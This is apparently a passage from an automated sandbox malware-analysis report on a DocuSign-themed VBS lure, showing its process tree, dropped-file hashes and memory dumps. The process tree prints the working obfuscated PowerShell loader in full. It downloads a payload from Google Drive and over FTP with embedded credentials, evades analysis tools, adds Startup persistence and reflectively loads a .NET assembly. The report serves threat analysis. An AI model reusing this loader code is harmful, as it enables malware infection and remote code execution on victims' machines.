'0ACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAoACAALA' + [char]66 + 'zAGIAeQ' + [char]66 + 'yAGoAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Adw' + [char]66 + 'wAHoAcA' + [char]66 + 'jACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHcAcA' + [char]66 + '6AHAAYwAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHcAcA' + [char]66 + '6AHAAYwAkADsAfQA7ACAAKQAnAHcANQAwAFoAMQA4AHUAYwA3AFoATQ' + [char]66 + 'LADgAOA' + [char]66 + 'nAGUAdA' + [char]66 + 'oAGoAbg' + [char]66 + '' + [char]66 + 'AHAAagAxAEwAQgAtADQAeQ' + [char]66 + 'IAGEAYQAxACcAIAArACAAcw' + [char]66 + 'iAHkAcg' + [char]66 + 'qACQAKAAgAD0AIA' + [char]66 + 'zAGIAeQ' + [char]66 + 'yAGoAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAVg' + [char]66 + 'FAFMAZA' + [char]66 + 'qAHcAVQA5ADUAUgAtAFcAcw' + [char]66 + 'ZAHUAWg' + [char]66 + 'MAGkAdw' + [char]66 + 'yAGIANQ' + [char]66 + 'ZAE4AUQAtAEgAag' + [char]66 + 'yAGIAMg' + [char]66 + 'wADEAJwAgACsAIA' + [char]66 + 'zAGIAeQ' + [char]66 + 'yAGoAJAAoACAAPQAgAHMAYg' + [char]66 + '5AHIAagAkAHsAIAApACAAYg' + [char]66 + 'RAFUAaQ' + [char]66 + 'QACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'iAFEAVQ' + [char]66 + 'pAFAAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAcw' + [char]66 + 'iAHkAcg' + [char]66 + 'qACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGoATQ' + [char]66 + 'PAHoASAAkAHsAIAApACAAeA' + [char]66 + 'DAGIAeA' + [char]66 + '2ACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAeA' + [char]66 + 'DAGIAeA' + [char]66 + '2ACQAIAA7AA==';$nnqvs = $nnqvs.replace('уЦϚ' , 'B') ;;$sljlp = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nnqvs ) ); $sljlp = $sljlp[-1..-$sljlp.Length] -join '';$sljlp = $sljlp.replace('%XRqhI%','C:\Users\Admin\Downloads\DocuSign01210021100\DocuSign01210021100.vbs');powershell $sljlp
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1276
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $vxbCx = $host.Version.Major.Equals(2) ;if ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$jrybs = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $PiUQb ) {$jrybs = ($jrybs + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jrybs = ($jrybs + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cpzpw = (New-Object Net.WebClient);$cpzpw.Encoding = [System.Text.Encoding]::UTF8;$cpzpw.DownloadFile($jrybs, ($HzOMj + '\Upwin.msu') );$tpWkF = ('C:\Users\' + [Environment]::UserName );HhXHB = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\DocuSign01210021100\DocuSign01210021100.vbs' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$qdtkb = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $qdtkb ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$sNwoM = ''C:\Users\Admin\Downloads\DocuSign01210021100\DocuSign01210021100.vbs'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.b/moc.nucnacnegaminoc//:sptth'' , $sNwoM , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
                                      3⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:372
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2944
                                • C:\Windows\system32\taskmgr.exe
                                  "C:\Windows\system32\taskmgr.exe" /4
                                  1⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:3880

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  6cf293cb4d80be23433eecf74ddb5503

                                  SHA1

                                  24fe4752df102c2ef492954d6b046cb5512ad408

                                  SHA256

                                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                  SHA512

                                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  0a9dc42e4013fc47438e96d24beb8eff

                                  SHA1

                                  806ab26d7eae031a58484188a7eb1adab06457fc

                                  SHA256

                                  58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

                                  SHA512

                                  868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  61cef8e38cd95bf003f5fdd1dc37dae1

                                  SHA1

                                  11f2f79ecb349344c143eea9a0fed41891a3467f

                                  SHA256

                                  ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

                                  SHA512

                                  6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1bfc337c-b84c-4f9e-aebc-4467f2d47b46.tmp

                                  Filesize

                                  5KB

                                  MD5

                                  d6a1acef4da2e4177c347ef16a250603

                                  SHA1

                                  d013a472940ef71690c1b67542deb16cd56ab7af

                                  SHA256

                                  3b02c0c8c71602e7a0a1d1be6eb81b60c3d6c2647fc5744b44fdc80bc2d4a209

                                  SHA512

                                  e7c156d1c00758d84e7c7b2819e23daf6bbc0fc1a84c457fb404cecea845f105d4b1b47fd837ab289987ec609e153bcf9b1f70ffeba7553df7b3aba5a9138404

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                  Filesize

                                  183B

                                  MD5

                                  29994cb6ce343398c2efdc2ffd0b8caa

                                  SHA1

                                  a6ef76f43fcda835ecbdb7ae3c9a92ea59ea71d9

                                  SHA256

                                  cdf728285153e134c9e005ec7da8a8c324d6fb4b33e3410c2704786c921e5399

                                  SHA512

                                  71b8954931b9b880a7165a596f0955dc2bfbf0d8a280eecd186612566b4054e05199599d120c483183c6066d0c2804d29d8e6683fb6af9d5cff4ea7b7a891945

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  6KB

                                  MD5

                                  508bcda3a07f2537284aa19c03233a25

                                  SHA1

                                  8f208d0d3fdf0a3ecf2c8fb4f4002209eed07316

                                  SHA256

                                  18670ef73f53435a779f704d3ff61d67cbed8cf221bdb2567fa695c89659f300

                                  SHA512

                                  8fd919e7353bdd857a2393c5104f192048003769b4a6e3c32ad4620ac6f873b1ea822aea816a40d36c65b9d340c63399ded10512411135504ef58a3c9393c426

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                  Filesize

                                  16B

                                  MD5

                                  6752a1d65b201c13b62ea44016eb221f

                                  SHA1

                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                  SHA256

                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                  SHA512

                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                  Filesize

                                  10KB

                                  MD5

                                  efd262d06889960d5d65c734149b755c

                                  SHA1

                                  7664b80eeb13857cc67cecbefe4a1dac71152d9d

                                  SHA256

                                  2a6be08a0f5adfa40f3cae82f36053aacca513d6e591fceb887d7b9c59803617

                                  SHA512

                                  8d5304dc9213c67308dfa6bc5746704371d3748b024c7ae5ed2bee179abbbe7dd0b474b98ebb4d82291277cd237a01fb6d722f9073a4022f30680f0317f653b5

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                  Filesize

                                  10KB

                                  MD5

                                  9b3743adfb325d1025bc13fb40558c43

                                  SHA1

                                  a8e97b6464dab74ff53f04825be094c0fd6bde7d

                                  SHA256

                                  ea35c101daf07c257ee3797ce9004477515895b980fe8dd213fb8f1d6a17cef4

                                  SHA512

                                  8a1d1ca74cb836075e4a8b0a9b7b610573ca37897abb6d999c09d78cf3ce7247eecd88cfb20beb30f9d47e59a2aa931ad7ce581b1d4b2e60e2b1588941a921e7

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  cfc7ec0abebb06dd687df0183392cd5c

                                  SHA1

                                  19739ce53bb2e7c170f52f083fe37878f20af2d0

                                  SHA256

                                  736746890cd8becc6a1353fdad03e1b6f3ace198e330639957cdd716fdc804a4

                                  SHA512

                                  9d1563dc5d48175c8d6391d0e13f6064325f14a58b7637262a97384d5adc0a518736e7042db10b56dec8273df98626b93b57e39476e2a61ab0601bae3be3909d

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  948B

                                  MD5

                                  217d9191dfd67252cef23229676c9eda

                                  SHA1

                                  80d940b01c28e3933b9d68b3e567adc2bac1289f

                                  SHA256

                                  e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

                                  SHA512

                                  86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bhnlih3x.1dh.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\dll02.txt

                                  Filesize

                                  2B

                                  MD5

                                  f3b25701fe362ec84616a93a45ce9998

                                  SHA1

                                  d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                  SHA256

                                  b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                  SHA512

                                  98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                • C:\Users\Admin\AppData\Local\Temp\dll03.ps1

                                  Filesize

                                  910B

                                  MD5

                                  847a0f975e7476812c54d80eabc2e7d1

                                  SHA1

                                  8805f0466902d1d557ff7c5e0ce8fbdeffafdc6a

                                  SHA256

                                  38a54d0343c852e25c00deaf561a0cf64ed3d462a6e067c64f8826b0674820d2

                                  SHA512

                                  9a31fed62ce011e03d5b85215a2e1ff013c16741917409d2ff7e6a09435f7432ae69b4b61e90d4fdba14b0053de02275bb8018ca74b419eafcfa262d12c5f2a0

                                • memory/1276-98-0x0000017110270000-0x0000017110292000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/2268-88-0x00000279AAA80000-0x00000279AAA9E000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/3880-139-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-148-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-147-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-146-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-145-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-149-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-150-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-151-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-140-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3880-141-0x0000019CFCA10000-0x0000019CFCA11000-memory.dmp

                                  Filesize

                                  4KB